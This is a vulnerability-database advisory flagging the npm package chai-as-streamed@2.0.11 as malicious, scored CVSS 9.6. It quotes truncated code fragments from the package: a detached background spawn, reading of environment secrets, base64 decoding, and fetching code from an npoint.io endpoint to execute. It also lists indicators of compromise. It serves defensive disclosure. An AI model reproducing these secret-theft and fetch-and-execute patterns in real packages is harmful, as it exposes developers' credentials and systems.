VDB

GCVE-110-OSM-2026-3023

GCVE-110-OSM-2026-3023
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published April 22, 2026
Malicious package detected. Behaviors: data exfiltration, code execution, network activity, obfuscated code. Payload: lib/initializeCaller.js Key findings: - Stealth Background Process Spawning in index.js: "spawn('node', [scriptPath, JSON.stringify(args)], { detached: true, stdi..." - Environment Variable Exfiltration in lib/initializeCaller.js: "process.env.DEV_SECRET_VALUE); let retryCount = 5; while (retryCount > 0) ..." - Global Variable Shadowing in lib/initializeCaller.js: "const process = {" - Base64 Decoded Environment Variable in lib/initializeCaller.js: "atob(process.env." - Fetch and Eval/Exec in lib/initializeCaller.js: "axios.get(apiEndpoint, { headers: { [apiHeaderKey]: apiHeaderValue } })).data.co..." IOCs: - urls: http://192.168.1.42:9200, https://api.npoint.io/29ebd497b6f232e6b0a9 - domains: api.npoint.io - payloadFileHash: a3a7d8dbe03b51b7ee5205f56632aa0921914b1981e783b417ea5494395516ab Decoded/deobfuscated IOCs: - urls: https://api.npoint.io/29ebd497b6f232e6b0a9 - domains: api.npoint.io

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownchai-as-streamed@2.0.11* (affected)

Browse GCVE Records

74,366 records in the GCVE database · Updated July 23, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›